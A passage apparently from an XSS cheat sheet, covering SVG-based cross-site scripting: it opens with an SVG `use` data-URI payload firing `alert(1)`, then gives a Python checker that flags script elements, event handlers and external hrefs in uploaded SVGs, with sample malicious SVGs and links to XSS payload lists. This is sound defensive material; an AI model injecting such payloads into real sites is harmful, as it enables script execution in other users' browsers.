<svg><use href="data:image/svg+xml,<svg id='x' xmlns='http://www.w3.org/2000/svg' ><image href='1' onerror='alert(1)' /></svg>#x" />
```
Find more SVG payloads in https://github.com/allanlw/svg-cheatsheet
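As an added example (not code from ghostlulz, PortSwigger or the svg-cheatsheet), a Python triage check that parses an uploaded SVG and lists the constructs shown above that make it unsafe to serve inline from the application's origin: `script` elements, `on*` event-handler attributes, `foreignObject`, `use`/`href` pointing at external or `data:` URLs, and animation elements that can rewrite attributes. The sample SVGs and the function names are constructed for the example.

```python
import xml.etree.ElementTree as ET

XLINK_NS = "http://www.w3.org/1999/xlink"

# Elements that run script, embed foreign content, or pull in other documents
DANGEROUS_ELEMENTS = {"script", "foreignObject", "iframe", "embed", "object", "use"}
# animate/set can rewrite attributes such as href at runtime, so flag them for review
ANIMATION_ELEMENTS = {"animate", "set", "animateTransform", "animateMotion"}
# Both the SVG 2 plain href and the xlink:href form resolve to the same sink
HREF_ATTRS = {"href", f"{{{XLINK_NS}}}href"}


def local_name(qname):
    """Strip the '{namespace}' prefix ElementTree puts on tag and attribute names."""
    return qname.rsplit("}", 1)[-1]


def find_svg_risks(svg_bytes):
    """Parse an SVG and return a list of findings; [] means a plain drawing.
    A document that does not parse is reported as a finding too, since the
    browser's HTML parser is far more forgiving than an XML parser."""
    try:
        root = ET.fromstring(svg_bytes)
    except ET.ParseError as exc:
        return [f"parse-error:{exc}"]
    findings = []
    for el in root.iter():
        name = local_name(el.tag)
        if name in DANGEROUS_ELEMENTS:
            findings.append(f"element:{name}")
        elif name in ANIMATION_ELEMENTS:
            findings.append(f"animation:{name}")
        for attr, value in el.attrib.items():
            aname = local_name(attr)
            if aname.lower().startswith("on"):
                findings.append(f"event-handler:{name}@{aname}")
            if attr in HREF_ATTRS:
                v = value.strip().lower()
                if v.startswith(("javascript:", "data:", "http:", "https:", "//")):
                    findings.append(f"href:{name}:{v}")
    return findings


def is_plain_svg(svg_bytes):
    return find_svg_risks(svg_bytes) == []


# Constructed samples for the example
BENIGN_SVG = b'''<?xml version="1.0"?>
<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100">
  <rect width="100" height="50" fill="blue"/>
</svg>'''
SCRIPT_SVG = b'''<svg xmlns="http://www.w3.org/2000/svg">
  <script type="text/javascript">alert("XSS")</script>
</svg>'''
HANDLER_SVG = b'''<svg xmlns="http://www.w3.org/2000/svg">
  <image href="x" onerror="alert(1)"/>
</svg>'''
USE_SVG = b'''<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <use xlink:href="//example.invalid/u.svg#x"/>
</svg>'''

if __name__ == "__main__":
    for label, doc in [("benign", BENIGN_SVG), ("script", SCRIPT_SVG),
                       ("handler", HANDLER_SVG), ("use", USE_SVG)]:
        print(label, find_svg_risks(doc))
```

Treat this as a triage gate, not a sanitizer: it does not inspect CSS `url()` in `style` attributes or entity tricks in a DTD. The robust mitigation for user-uploaded SVG is to serve it from a separate origin or with `Content-Disposition: attachment` and a restrictive CSP, so that even a payload the check misses cannot execute in the application's origin.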
Misc JS Tricks & Relevant Info
XSS Resources
- https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20injection
- http://www.xss-payloads.com
- https://github.com/Pgaijin66/XSS-Payloads/blob/master/payload.txt
- https://github.com/materaj/xss-list
- https://github.com/ismailtasdelen/xss-payload-list
- https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec
- https://netsec.expert/2020/02/01/xss-in-2020.html
- https://www.intigriti.com/researchers/blog/hacking-tools/hunting-for-blind-cross-site-scripting-xss-vulnerabilities-a-complete-guide
References
- Turning a harmless XSS behind a WAF into a realistic phishing vector
- XSS and SSRF via the List-Unsubscribe SMTP Header in Horde Webmail and Nextcloud Mail
- HackerOne Report #2902856 - Nextcloud Mail List-Unsubscribe SSRF
- From "Low-Impact" RXSS to Credential Stealer: A JS-in-JS Walkthrough
- MDN eval()
- CAPIG XSS: postMessage origin trust becomes a script loader + backend JS concatenation enables supply-chain stored XSS
- MobSF stored XSS via manifest analysis (unsafe Django safe sink)